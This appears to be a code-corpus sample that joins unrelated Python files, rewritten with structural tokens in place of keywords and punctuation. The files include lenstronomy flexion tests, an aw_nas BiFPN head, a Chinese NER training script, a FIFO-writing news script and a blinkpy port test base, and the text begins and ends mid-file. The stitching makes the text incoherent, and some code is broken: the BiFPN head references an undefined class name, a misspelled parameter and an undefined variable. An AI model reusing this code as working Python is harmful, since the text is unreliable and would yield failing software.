torch.ones(anom.size(0))<times>outlier_classes[0]))<if_stmt>norm_dim<eq>3<block_start>data=data.squeeze(1)<block_end>train_set.data=data<line_sep>train_set.targets=targets<if_stmt>gt<block_start>gtmaps=torch.cat((torch.zeros_like(norm)[: 0].float() # 0 for nominal (norm<ne>anom).max(1)[0].clone().float())# 1 for anomalous )<if_stmt>norm_dim<eq>4<block_start>gtmaps=gtmaps.unsqueeze(1)<block_end><return>train_set gtmaps<block_end><else_stmt><block_start><return>train_set<block_end><block_end>
__author__='sibirrer'<import_from_stmt>lenstronomy.LensModel.Profiles.flexion Flexion<import_from_stmt>lenstronomy.LensModel.lens_model LensModel<import_stmt>numpy<as>np<import_stmt>numpy.testing<as>npt<import_stmt>pytest<class_stmt>TestExternalShear(object)<block_start>""" tests the Gaussian methods """<def_stmt>setup self<block_start>self.flex=Flexion()<line_sep>g1,g2,g3,g4=0.01 0.02 0.03 0.04<line_sep>self.kwargs_lens={'g1':g1 'g2':g2 'g3':g3 'g4':g4}<block_end><def_stmt>test_function self<block_start>x=np.array([1])<line_sep>y=np.array([2])<line_sep>values=self.flex.function(x y **self.kwargs_lens)<line_sep>npt.assert_almost_equal(values[0] 0.135 decimal=5)<line_sep>x=np.array([0])<line_sep>y=np.array([0])<line_sep>values=self.flex.function(x y **self.kwargs_lens)<line_sep>npt.assert_almost_equal(values[0] 0 decimal=5)<line_sep>x=np.array([2 3 4])<line_sep>y=np.array([1 1 1])<line_sep>values=self.flex.function(x y **self.kwargs_lens)<line_sep>npt.assert_almost_equal(values[0] 0.09 decimal=5)<line_sep>npt.assert_almost_equal(values[1] 0.18666666666666668 decimal=5)<block_end><def_stmt>test_derivatives self<block_start>x=np.array([1])<line_sep>y=np.array([2])<line_sep>f_x,f_y=self.flex.derivatives(x y **self.kwargs_lens)<line_sep>npt.assert_almost_equal(f_x[0] 0.105 decimal=5)<line_sep>npt.assert_almost_equal(f_y[0] 0.15 decimal=5)<line_sep>x=np.array([1 3 4])<line_sep>y=np.array([2 1 1])<line_sep>values=self.flex.derivatives(x y **self.kwargs_lens)<line_sep>npt.assert_almost_equal(values[0][0] 0.105 decimal=5)<line_sep>npt.assert_almost_equal(values[1][0] 0.15 decimal=5)<block_end><def_stmt>test_hessian self<block_start>x=np.array(1)<line_sep>y=np.array(2)<line_sep>f_xx,f_xy,f_yx,f_yy=self.flex.hessian(x y **self.kwargs_lens)<line_sep>npt.assert_almost_equal(f_xx 0.05 decimal=5)<line_sep>npt.assert_almost_equal(f_yy 0.11 decimal=5)<line_sep>npt.assert_almost_equal(f_xy 0.08 decimal=5)<line_sep>npt.assert_almost_equal(f_xy f_yx decimal=8)<line_sep>x=np.array([1 3 4])<line_sep>y=np.array([2 1 1])<line_sep>values=self.flex.hessian(x y **self.kwargs_lens)<line_sep>npt.assert_almost_equal(values[0][0] 0.05 decimal=5)<line_sep>npt.assert_almost_equal(values[3][0] 0.11 decimal=5)<line_sep>npt.assert_almost_equal(values[2][0] 0.08 decimal=5)<line_sep>npt.assert_almost_equal(values[1][0] 0.08 decimal=5)<block_end><def_stmt>test_flexion self<block_start>x=np.array(0)<line_sep>y=np.array(2)<line_sep>flex=LensModel(['FLEXION'])<line_sep>f_xxx,f_xxy,f_xyy,f_yyy=flex.flexion(x y [self.kwargs_lens])<line_sep>npt.assert_almost_equal(f_xxx self.kwargs_lens['g1'] decimal=9)<line_sep>npt.assert_almost_equal(f_xxy self.kwargs_lens['g2'] decimal=9)<line_sep>npt.assert_almost_equal(f_xyy self.kwargs_lens['g3'] decimal=9)<line_sep>npt.assert_almost_equal(f_yyy self.kwargs_lens['g4'] decimal=9)<block_end><def_stmt>test_magnification self<block_start>ra_0,dec_0=1 -1<line_sep>flex=LensModel(['FLEXION'])<line_sep>g1,g2,g3,g4=0.01 0.02 0.03 0.04<line_sep>kwargs={'g1':g1 'g2':g2 'g3':g3 'g4':g4 'ra_0':ra_0 'dec_0':dec_0}<line_sep>mag=flex.magnification(ra_0 dec_0 [kwargs])<line_sep>npt.assert_almost_equal(mag 1 decimal=8)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>pytest.main()<block_end>
<import_from_stmt>aw_nas.weights_manager.wrapper BaseHead<import_from_stmt>.classifiers BiFPNClassifier<line_sep>__all__=["BiFPNHead"]<class_stmt>BiFPNHead(BaseHead)<block_start>NAME="bifpn_head"<def_stmt>__init__ self device num_classes feature_channels bifpn_out_channels activation="swish" num_layers=4 has_backgroud=<true> schedule_cfg=<none> <block_start>super(BiFPNHeader).__init__(schedule_cfg)<line_sep>self.num_classes=num_classes<line_sep>num_anchors=9<line_sep>self.reg=BiFPNClassifier(bifpn_out_channels num_anchors 4 num_layers activation)<line_sep>self.cls=BiFPNClassifier(bifpn_out_channels num_anchors num_classes+int(has_background) num_layers activation )<line_sep>self.device=device<line_sep>self.pretrained_path=pretrained_path<block_end><def_stmt>forward self features<block_start><return>self.cls(features) self.reg(features)<block_end><block_end>
# Real part of spherical harmonic Y_(4,2)(theta,phi) <def_stmt>Y l m<block_start><def_stmt>g theta phi<block_start>R=abs(fp.re(fp.spherharm(l m theta phi)))<line_sep>x=R<times>fp.cos(phi)<times>fp.sin(theta)<line_sep>y=R<times>fp.sin(phi)<times>fp.sin(theta)<line_sep>z=R<times>fp.cos(theta)<line_sep><return>[x y z]<block_end><return>g<block_end>fp.splot(Y(4 2) [0 fp.pi] [0 2<times>fp.pi] points=300)<line_sep>
# -*- coding: utf-8 -*- # @Author: <NAME> # @Last Modified by: <NAME>, Contact: <EMAIL> <import_stmt>time<import_stmt>sys<import_stmt>argparse<import_stmt>random<import_stmt>torch<import_stmt>gc<import_stmt>pickle<import_stmt>os<import_stmt>torch.autograd<as>autograd<import_stmt>torch.optim<as>optim<import_stmt>numpy<as>np<import_from_stmt>utils.metric get_ner_fmeasure<import_from_stmt>model.LGN Graph<import_from_stmt>utils.data Data<def_stmt>str2bool v<block_start><if_stmt>isinstance(v bool)<block_start><return>v<block_end><if_stmt>v.lower()<in>('yes' 'true' 't' 'y' '1')<block_start><return><true><block_end><elif_stmt>v.lower()<in>('no' 'false' 'f' 'n' '0')<block_start><return><false><block_end><else_stmt><block_start><raise>argparse.ArgumentTypeError('Boolean value expected.')<block_end><block_end><def_stmt>lr_decay optimizer epoch decay_rate init_lr<block_start>lr=init_lr<times>((1-decay_rate)<power>epoch)<line_sep>print(" Learning rate is setted as:" lr)<for_stmt>param_group optimizer.param_groups<block_start><if_stmt>param_group['name']<eq>'aggr'<block_start>param_group['lr']=lr<times>2.<block_end><else_stmt><block_start>param_group['lr']=lr<block_end><block_end><return>optimizer<block_end><def_stmt>data_initialization data word_file train_file dev_file test_file<block_start>data.build_word_file(word_file)<if_stmt>train_file<block_start>data.build_alphabet(train_file)<line_sep>data.build_word_alphabet(train_file)<block_end><if_stmt>dev_file<block_start>data.build_alphabet(dev_file)<line_sep>data.build_word_alphabet(dev_file)<block_end><if_stmt>test_file<block_start>data.build_alphabet(test_file)<line_sep>data.build_word_alphabet(test_file)<block_end><return>data<block_end><def_stmt>predict_check pred_variable gold_variable mask_variable<block_start>pred=pred_variable.cpu().data.numpy()<line_sep>gold=gold_variable.cpu().data.numpy()<line_sep>mask=mask_variable.cpu().data.numpy()<line_sep>overlaped=(pred<eq>gold)<line_sep>right_token=np.sum(overlaped<times>mask)<line_sep>total_token=mask.sum()<line_sep><return>right_token total_token<block_end><def_stmt>recover_label pred_variable gold_variable mask_variable label_alphabet<block_start>batch_size=gold_variable.size(0)<line_sep>seq_len=gold_variable.size(1)<line_sep>mask=mask_variable.cpu().data.numpy()<line_sep>pred_tag=pred_variable.cpu().data.numpy()<line_sep>gold_tag=gold_variable.cpu().data.numpy()<line_sep>pred_label=[]<line_sep>gold_label=[]<for_stmt>idx range(batch_size)<block_start>pred=[label_alphabet.get_instance(pred_tag[idx][idy])<for>idy range(seq_len)<if>mask[idx][idy]<ne>0]<line_sep>gold=[label_alphabet.get_instance(gold_tag[idx][idy])<for>idy range(seq_len)<if>mask[idx][idy]<ne>0]<assert_stmt>(len(pred)<eq>len(gold))<line_sep>pred_label.append(pred)<line_sep>gold_label.append(gold)<block_end><return>pred_label gold_label<block_end><def_stmt>print_args args<block_start>print("CONFIG SUMMARY:")<line_sep>print(" Batch size: %s"%(args.batch_size))<line_sep>print(" If use GPU: %s"%(args.use_gpu))<line_sep>print(" If use CRF: %s"%(args.use_crf))<line_sep>print(" Epoch number: %s"%(args.num_epoch))<line_sep>print(" Learning rate: %s"%(args.lr))<line_sep>print(" L2 normalization rate: %s"%(args.weight_decay))<line_sep>print(" If use edge embedding: %s"%(args.use_edge))<line_sep>print(" If use global node: %s"%(args.use_global))<line_sep>print(" Bidirectional digraph: %s"%(args.bidirectional))<line_sep>print(" Update step number: %s"%(args.iters))<line_sep>print(" Attention dropout rate: %s"%(args.tf_drop_rate))<line_sep>print(" Embedding dropout rate: %s"%(args.emb_drop_rate))<line_sep>print(" Hidden state dimension: %s"%(args.hidden_dim))<line_sep>print(" Learning rate decay ratio: %s"%(args.lr_decay))<line_sep>print(" Aggregation module dropout rate: %s"%(args.cell_drop_rate))<line_sep>print(" Head number of attention: %s"%(args.num_head))<line_sep>print(" Head dimension of attention: %s"%(args.head_dim))<line_sep>print("CONFIG SUMMARY END.")<line_sep>sys.stdout.flush()<block_end><def_stmt>evaluate data args model name<block_start><if_stmt>name<eq>"train"<block_start>instances=data.train_Ids<block_end><elif_stmt>name<eq>"dev"<block_start>instances=data.dev_Ids<block_end><elif_stmt>name<eq>'test'<block_start>instances=data.test_Ids<block_end><elif_stmt>name<eq>'raw'<block_start>instances=data.raw_Ids<block_end><else_stmt><block_start>print("Error: wrong evaluate name," name)<line_sep>exit(0)<block_end>pred_results=[]<line_sep>gold_results=[]<line_sep># set model in eval model model.eval()<line_sep>batch_size=args.batch_size<line_sep>start_time=time.time()<line_sep>train_num=len(instances)<line_sep>total_batch=train_num<floordiv>batch_size+1<for_stmt>batch_id range(total_batch)<block_start>start=batch_id<times>batch_size<line_sep>end=(batch_id+1)<times>batch_size<if_stmt>end<g>train_num<block_start>end=train_num<block_end>instance=instances[start:end]<if_stmt><not>instance<block_start><continue><block_end>word_list,batch_char,batch_label,mask=batchify_with_label(instance args.use_gpu)<line_sep>_,tag_seq=model(word_list batch_char mask)<line_sep>pred_label,gold_label=recover_label(tag_seq batch_label mask data.label_alphabet)<line_sep>pred_results<augadd>pred_label<line_sep>gold_results<augadd>gold_label<block_end>decode_time=time.time()-start_time<line_sep>speed=len(instances)/decode_time<line_sep>acc,p,r,f=get_ner_fmeasure(gold_results pred_results)<line_sep><return>speed acc p r f pred_results<block_end><def_stmt>batchify_with_label input_batch_list gpu<block_start>batch_size=len(input_batch_list)<line_sep>chars=[sent[0]<for>sent input_batch_list]<line_sep>words=[sent[1]<for>sent input_batch_list]<line_sep>labels=[sent[2]<for>sent input_batch_list]<line_sep>sent_lengths=torch.LongTensor(list(map(len chars)))<line_sep>max_sent_len=sent_lengths.max()<line_sep>char_seq_tensor=autograd.Variable(torch.zeros((batch_size max_sent_len))).long()<line_sep>label_seq_tensor=autograd.Variable(torch.zeros((batch_size max_sent_len))).long()<line_sep>mask=autograd.Variable(torch.zeros((batch_size max_sent_len))).byte()<for_stmt>idx,(seq label seq_len) enumerate(zip(chars labels sent_lengths))<block_start>char_seq_tensor[idx :seq_len]=torch.LongTensor(seq)<line_sep>label_seq_tensor[idx :seq_len]=torch.LongTensor(label)<line_sep>mask[idx :seq_len]=torch.Tensor([1]<times>int(seq_len))<block_end><if_stmt>gpu<block_start>char_seq_tensor=char_seq_tensor.cuda()<line_sep>label_seq_tensor=label_seq_tensor.cuda()<line_sep>mask=mask.cuda()<block_end><return>words char_seq_tensor label_seq_tensor mask<block_end><def_stmt>train data args saved_model_path<block_start>print("Training model...")<line_sep>model=Graph(data args)<if_stmt>args.use_gpu<block_start>model=model.cuda()<block_end>print('# generated parameters:' sum(param.numel()<for>param model.parameters()))<line_sep>print("Finished built model.")<line_sep>best_dev_epoch=0<line_sep>best_dev_f=-1<line_sep>best_dev_p=-1<line_sep>best_dev_r=-1<line_sep>best_test_f=-1<line_sep>best_test_p=-1<line_sep>best_test_r=-1<line_sep># Initialize the optimizer aggr_module_params=[]<line_sep>other_module_params=[]<for_stmt>m_name model._modules<block_start>m=model._modules[m_name]<if_stmt>isinstance(m torch.nn.ModuleList)<block_start><for_stmt>p m.parameters()<block_start><if_stmt>p.requires_grad<block_start>aggr_module_params.append(p)<block_end><block_end><block_end><else_stmt><block_start><for_stmt>p m.parameters()<block_start><if_stmt>p.requires_grad<block_start>other_module_params.append(p)<block_end><block_end><block_end><block_end>optimizer=optim.Adam([{"params":(aggr_module_params) "name":"aggr"} {"params":(other_module_params) "name":"other"}] lr=args.lr weight_decay=args.weight_decay)<for_stmt>idx range(args.num_epoch)<block_start>epoch_start=time.time()<line_sep>temp_start=epoch_start<line_sep>print(("Epoch: %s/%s"%(idx args.num_epoch)))<line_sep>optimizer=lr_decay(optimizer idx args.lr_decay args.lr)<line_sep>sample_loss=0<line_sep>batch_loss=0<line_sep>total_loss=0<line_sep>right_token=0<line_sep>whole_token=0<line_sep>random.shuffle(data.train_Ids)<line_sep># set model in train model model.train()<line_sep>model.zero_grad()<line_sep>batch_size=args.batch_size<line_sep>train_num=len(data.train_Ids)<line_sep>total_batch=train_num<floordiv>batch_size+1<for_stmt>batch_id range(total_batch)# Get one batch-sized instance <block_start>start=batch_id<times>batch_size<line_sep>end=(batch_id+1)<times>batch_size<if_stmt>end<g>train_num<block_start>end=train_num<block_end>instance=data.train_Ids[start:end]<if_stmt><not>instance<block_start><continue><block_end>word_list,batch_char,batch_label,mask=batchify_with_label(instance args.use_gpu)<line_sep>loss,tag_seq=model(word_list batch_char mask batch_label)<line_sep>right,whole=predict_check(tag_seq batch_label mask)<line_sep>right_token<augadd>right<line_sep>whole_token<augadd>whole<line_sep>sample_loss<augadd>loss.data<line_sep>total_loss<augadd>loss.data<line_sep>batch_loss<augadd>loss<if_stmt>end%500<eq>0<block_start>temp_time=time.time()<line_sep>temp_cost=temp_time-temp_start<line_sep>temp_start=temp_time<line_sep>print((" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f"%(end temp_cost sample_loss right_token whole_token (right_token+0.)/whole_token)))<line_sep>sys.stdout.flush()<line_sep>sample_loss=0<block_end><if_stmt>end%args.batch_size<eq>0<block_start>batch_loss.backward()<line_sep>optimizer.step()<line_sep>model.zero_grad()<line_sep>batch_loss=0<block_end><block_end>temp_time=time.time()<line_sep>temp_cost=temp_time-temp_start<line_sep>print((" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f"%(end temp_cost sample_loss right_token whole_token (right_token+0.)/whole_token)))<line_sep>epoch_finish=time.time()<line_sep>epoch_cost=epoch_finish-epoch_start<line_sep>print(("Epoch: %s training finished. Time: %.2fs, speed: %.2fst/s, total loss: %s"%(idx epoch_cost train_num/epoch_cost total_loss)))<line_sep># dev speed,acc,dev_p,dev_r,dev_f,_=evaluate(data args model "dev")<line_sep>dev_finish=time.time()<line_sep>dev_cost=dev_finish-epoch_finish<line_sep>print(("Dev: time: %.2fs, speed: %.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f"%(dev_cost speed acc dev_p dev_r dev_f)))<line_sep># test speed,acc,test_p,test_r,test_f,_=evaluate(data args model "test")<line_sep>test_finish=time.time()<line_sep>test_cost=test_finish-dev_finish<line_sep>print(("Test: time: %.2fs, speed: %.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f"%(test_cost speed acc test_p test_r test_f)))<if_stmt>dev_f<g>best_dev_f<block_start>print("Exceed previous best f score: %.4f"%best_dev_f)<line_sep>torch.save(model.state_dict() saved_model_path+"_best")<line_sep>best_dev_p=dev_p<line_sep>best_dev_r=dev_r<line_sep>best_dev_f=dev_f<line_sep>best_dev_epoch=idx+1<line_sep>best_test_p=test_p<line_sep>best_test_r=test_r<line_sep>best_test_f=test_f<block_end>model_idx_path=saved_model_path+"_"+str(idx)<line_sep>torch.save(model.state_dict() model_idx_path)<with_stmt>open(saved_model_path+"_result.txt" "a")<as>file<block_start>file.write(model_idx_path+'\n')<line_sep>file.write("Dev score: %.4f, r: %.4f, f: %.4f\n"%(dev_p dev_r dev_f))<line_sep>file.write("Test score: %.4f, r: %.4f, f: %.4f\n\n"%(test_p test_r test_f))<line_sep>file.close()<block_end>print("Best dev epoch: %d"%best_dev_epoch)<line_sep>print("Best dev score: p: %.4f, r: %.4f, f: %.4f"%(best_dev_p best_dev_r best_dev_f))<line_sep>print("Best test score: p: %.4f, r: %.4f, f: %.4f"%(best_test_p best_test_r best_test_f))<line_sep>gc.collect()<block_end><with_stmt>open(saved_model_path+"_result.txt" "a")<as>file<block_start>file.write("Best epoch: %d"%best_dev_epoch+'\n')<line_sep>file.write("Best Dev score: %.4f, r: %.4f, f: %.4f\n"%(best_dev_p best_dev_r best_dev_f))<line_sep>file.write("Test score: %.4f, r: %.4f, f: %.4f\n\n"%(best_test_p best_test_r best_test_f))<line_sep>file.close()<block_end><with_stmt>open(saved_model_path+"_best_HP.config" "wb")<as>file<block_start>pickle.dump(args file)<block_end><block_end><def_stmt>load_model_decode model_dir data args name<block_start>model_dir=model_dir+"_best"<line_sep>print("Load Model from file: " model_dir)<line_sep>model=Graph(data args)<line_sep>model.load_state_dict(torch.load(model_dir))<line_sep># load model need consider if the model trained in GPU and load in CPU, or vice versa <if_stmt>args.use_gpu<block_start>model=model.cuda()<block_end>print(("Decode %s data ..."%name))<line_sep>start_time=time.time()<line_sep>speed,acc,p,r,f,pred_results=evaluate(data args model name)<line_sep>end_time=time.time()<line_sep>time_cost=end_time-start_time<line_sep>print(("%s: time:%.2fs, speed:%.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f"%(name time_cost speed acc p r f)))<line_sep><return>pred_results<block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--status' choices=['train' 'test' 'decode'] help='Function status.' default='train')<line_sep>parser.add_argument('--use_gpu' type=str2bool default=<true>)<line_sep>parser.add_argument('--train' help='Training set.' default='data/onto4ner.cn/train.char.bmes')<line_sep>parser.add_argument('--dev' help='Developing set.' default='data/onto4ner.cn/dev.char.bmes')<line_sep>parser.add_argument('--test' help='Testing set.' default='data/onto4ner.cn/test.char.bmes')<line_sep>parser.add_argument('--raw' help='Raw file for decoding.')<line_sep>parser.add_argument('--output' help='Output results for decoding.')<line_sep>parser.add_argument('--saved_set' help='Path of saved data set.' default='data/onto4ner.cn/saved.dset')<line_sep>parser.add_argument('--saved_model' help='Path of saved model.' default="saved_model/model_onto4ner")<line_sep>parser.add_argument('--char_emb' help='Path of character embedding file.' default="data/gigaword_chn.all.a2b.uni.ite50.vec")<line_sep>parser.add_argument('--word_emb' help='Path of word embedding file.' default="data/ctb.50d.vec")<line_sep>parser.add_argument('--use_crf' type=str2bool default=<true>)<line_sep>parser.add_argument('--use_edge' type=str2bool default=<true> help='If use lexicon embeddings (edge embeddings).')<line_sep>parser.add_argument('--use_global' type=str2bool default=<true> help='If use the global node.')<line_sep>parser.add_argument('--bidirectional' type=str2bool default=<true> help='If use bidirectional digraph.')<line_sep>parser.add_argument('--seed' help='Random seed' default=1023 type=int)<line_sep>parser.add_argument('--batch_size' help='Batch size.' default=1 type=int)<line_sep>parser.add_argument('--num_epoch' default=100 type=int help="Epoch number.")<line_sep>parser.add_argument('--iters' default=4 type=int help='The number of Graph iterations.')<line_sep>parser.add_argument('--hidden_dim' default=50 type=int help='Hidden state size.')<line_sep>parser.add_argument('--num_head' default=10 type=int help='Number of transformer head.')<line_sep>parser.add_argument('--head_dim' default=20 type=int help='Head dimension of transformer.')<line_sep>parser.add_argument('--tf_drop_rate' default=0.1 type=float help='Transformer dropout rate.')<line_sep>parser.add_argument('--emb_drop_rate' default=0.5 type=float help='Embedding dropout rate.')<line_sep>parser.add_argument('--cell_drop_rate' default=0.2 type=float help='Aggregation module dropout rate.')<line_sep>parser.add_argument('--word_alphabet_size' type=int help='Word alphabet size.')<line_sep>parser.add_argument('--char_alphabet_size' type=int help='Char alphabet size.')<line_sep>parser.add_argument('--label_alphabet_size' type=int help='Label alphabet size.')<line_sep>parser.add_argument('--char_dim' type=int help='Char embedding size.')<line_sep>parser.add_argument('--word_dim' type=int help='Word embedding size.')<line_sep>parser.add_argument('--lr' type=float default=2e-05)<line_sep>parser.add_argument('--lr_decay' type=float default=0)<line_sep>parser.add_argument('--weight_decay' type=float default=0)<line_sep>args=parser.parse_args()<line_sep>status=args.status.lower()<line_sep>seed_num=args.seed<line_sep>random.seed(seed_num)<line_sep>torch.manual_seed(seed_num)<line_sep>np.random.seed(seed_num)<line_sep>train_file=args.train<line_sep>dev_file=args.dev<line_sep>test_file=args.test<line_sep>raw_file=args.raw<line_sep>output_file=args.output<line_sep>saved_set_path=args.saved_set<line_sep>saved_model_path=args.saved_model<line_sep>char_file=args.char_emb<line_sep>word_file=args.word_emb<if_stmt>status<eq>'train'<block_start><if_stmt>os.path.exists(saved_set_path)<block_start>print('Loading saved data set...')<with_stmt>open(saved_set_path 'rb')<as>f<block_start>data=pickle.load(f)<block_end><block_end><else_stmt><block_start>data=Data()<line_sep>data_initialization(data word_file train_file dev_file test_file)<line_sep>data.generate_instance_with_words(train_file 'train')<line_sep>data.generate_instance_with_words(dev_file 'dev')<line_sep>data.generate_instance_with_words(test_file 'test')<line_sep>data.build_char_pretrain_emb(char_file)<line_sep>data.build_word_pretrain_emb(word_file)<if_stmt>saved_set_path<is><not><none><block_start>print('Dumping data...')<with_stmt>open(saved_set_path 'wb')<as>f<block_start>pickle.dump(data f)<block_end><block_end><block_end>data.show_data_summary()<line_sep>args.word_alphabet_size=data.word_alphabet.size()<line_sep>args.char_alphabet_size=data.char_alphabet.size()<line_sep>args.label_alphabet_size=data.label_alphabet.size()<line_sep>args.char_dim=data.char_emb_dim<line_sep>args.word_dim=data.word_emb_dim<line_sep>print_args(args)<line_sep>train(data args saved_model_path)<block_end><elif_stmt>status<eq>'test'<block_start><assert_stmt><not>(test_file<is><none>)<if_stmt>os.path.exists(saved_set_path)<block_start>print('Loading saved data set...')<with_stmt>open(saved_set_path 'rb')<as>f<block_start>data=pickle.load(f)<block_end><block_end><else_stmt><block_start>print("Cannot find saved data set: " saved_set_path)<line_sep>exit(0)<block_end>data.generate_instance_with_words(test_file 'test')<with_stmt>open(saved_model_path+"_best_HP.config" "rb")<as>f<block_start>args=pickle.load(f)<block_end>data.show_data_summary()<line_sep>print_args(args)<line_sep>load_model_decode(saved_model_path data args "test")<block_end><elif_stmt>status<eq>'decode'<block_start><assert_stmt><not>(raw_file<is><none><or>output_file<is><none>)<if_stmt>os.path.exists(saved_set_path)<block_start>print('Loading saved data set...')<with_stmt>open(saved_set_path 'rb')<as>f<block_start>data=pickle.load(f)<block_end><block_end><else_stmt><block_start>print("Cannot find saved data set: " saved_set_path)<line_sep>exit(0)<block_end>data.generate_instance_with_words(raw_file 'raw')<with_stmt>open(saved_model_path+"_best_HP.config" "rb")<as>f<block_start>args=pickle.load(f)<block_end>data.show_data_summary()<line_sep>print_args(args)<line_sep>decode_results=load_model_decode(saved_model_path data args "raw")<line_sep>data.write_decoded_results(output_file decode_results 'raw')<block_end><else_stmt><block_start>print("Invalid argument! Please use valid arguments! (train/test/decode)")<block_end><block_end>
# _*_ coding: utf-8 _*_ # # This script creates a named pipe (if it doesn't exist) # and writes the feed name, article title and url to it # whenever an article is saved to the database. # # This is useful for composing systems that constantly read # the FIFO and do things like emit the data to IRC channels. # # You could, for instance, perform fuzzy pattern matching and be # notified when certain keywords are in the news. # # Transmission to a natural language processing/translation service # can also be done in a script or by reading a FIFO like the one here. # # Whether you use this system to profit, perform intelligence analysis # or inform your next vote is hopefully up to you! # # <NAME>, 2015 # MIT License # Many big thanks to God, lord of universes. fifo="/tmp/emissary.pipe"<import_stmt>os stat<if_stmt><not>os.path.exists(fifo)<block_start><try_stmt><block_start>os.mkfifo(fifo)<block_end><except_stmt>Exception e<block_start>cache['app'].log("Error creating %s: %s"%(fifo e.message))<block_end><block_end># Emissary always executes scripts with an article and its feed in the namespace. # There is also a dictionary named cache, containing the app object. # Random aside but through the app object you can access the logging interface and the feed manager. <try_stmt># READER BEWARE: Use non-blocking IO or you won't be storing owt. <block_start>fd=os.open(fifo os.O_CREAT|os.O_WRONLY|os.O_NONBLOCK)<line_sep>os.write(fd "%s: %s\n%s\n"%(feed.name article.title article.url))<line_sep>os.close(fd)<del_stmt>fd<block_end><except_stmt>Exception e# Usually due to there not being a reader fd known to the kernel. <block_start><pass><block_end><del_stmt>os stat fifo<line_sep>
# Copyright (C) 2010 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit testing base class for Port implementations."""<import_stmt>collections<import_stmt>optparse<import_from_stmt>blinkpy.common exit_codes<import_from_stmt>blinkpy.common.system.executive ScriptError<import_from_stmt>blinkpy.common.system.executive_mock MockExecutive<import_from_stmt>blinkpy.common.system.log_testing LoggingTestCase<import_from_stmt>blinkpy.common.system.system_host SystemHost<import_from_stmt>blinkpy.common.system.system_host_mock MockSystemHost<import_from_stmt>blinkpy.web_tests.port.base Port<class_stmt>FakePrinter(object)<block_start><def_stmt>write_update self msg<block_start><pass><block_end><def_stmt>write_throttled_update self msg<block_start><pass><block_end><block_end><class_stmt>PortTestCase(LoggingTestCase)<block_start>"""Tests that all Port implementations must pass."""<line_sep># Some tests in this class test or override protected methods # pylint: disable=protected-access HTTP_PORTS=(8000 8080 8443)<line_sep>WEBSOCKET_PORTS=(8880 )<line_sep># Subclasses override this to point to their Port subclass. os_name=<none><line_sep>os_version=<none><line_sep>port_maker=Port<line_sep>port_name=<none><line_sep>full_port_name=<none><def_stmt>make_port self host=<none> port_name=<none> options=<none> os_name=<none> os_version=<none> **kwargs<block_start>host=host<or>MockSystemHost(os_name=(os_name<or>self.os_name) os_version=(os_version<or>self.os_version))<line_sep>options=options<or>optparse.Values({'configuration':'Release' 'use_xvfb':<true>})<line_sep>port_name=port_name<or>self.port_name<line_sep>port_name=self.port_maker.determine_full_port_name(host options port_name)<line_sep><return>self.port_maker(host port_name options=options **kwargs)<block_end><def_stmt>test_check_build self<block_start>port=self.make_port()<line_sep># Here we override methods to make it appear as though the build # requirements are all met and the driver is found. port._check_file_exists=<lambda>path desc:<true><if_stmt>port._dump_reader<block_start>port._dump_reader.check_is_functional=<lambda>:<true><block_end>port._options.build=<true><line_sep>port._check_driver_build_up_to_date=<lambda>config:<true><line_sep>port.check_httpd=<lambda>:<true><line_sep>self.assertEqual(port.check_build(needs_http=<true> printer=FakePrinter()) exit_codes.OK_EXIT_STATUS)<line_sep>logs=''.join(self.logMessages())<line_sep>self.assertNotIn('build requirements' logs)<line_sep># And here, after changing it so that the driver binary is not found, # we get an error exit status and message about build requirements. port._check_file_exists=<lambda>path desc:<false><line_sep>self.assertEqual(port.check_build(needs_http=<true> printer=FakePrinter()) exit_codes.UNEXPECTED_ERROR_EXIT_STATUS)<line_sep>logs=''.join(self.logMessages())<line_sep>self.assertIn('build requirements' logs)<block_end><def_stmt>test_default_batch_size self<block_start>port=self.make_port()<line_sep># Test that we set a finite batch size for sanitizer builds. port._options.enable_sanitizer=<true><line_sep>sanitized_batch_size=port.default_batch_size()<line_sep>self.assertIsNotNone(sanitized_batch_size)<block_end><def_stmt>test_default_child_processes self<block_start>port=self.make_port()<line_sep>num_workers=port.default_child_processes()<line_sep>self.assertGreaterEqual(num_workers 1)<block_end><def_stmt>test_default_max_locked_shards self<block_start>port=self.make_port()<line_sep>port.default_child_processes=<lambda>:16<line_sep>self.assertEqual(port.default_max_locked_shards() 4)<line_sep>port.default_child_processes=<lambda>:2<line_sep>self.assertEqual(port.default_max_locked_shards() 1)<block_end><def_stmt>test_default_timeout_ms self<block_start>self.assertEqual(self.make_port().timeout_ms() 6000)<block_end><def_stmt>test_timeout_ms_release self<block_start>self.assertEqual(self.make_port(options=optparse.Values({'configuration':'Release'})).timeout_ms() self.make_port().timeout_ms())<block_end><def_stmt>test_timeout_ms_debug self<block_start>self.assertEqual(self.make_port(options=optparse.Values({'configuration':'Debug'})).timeout_ms() 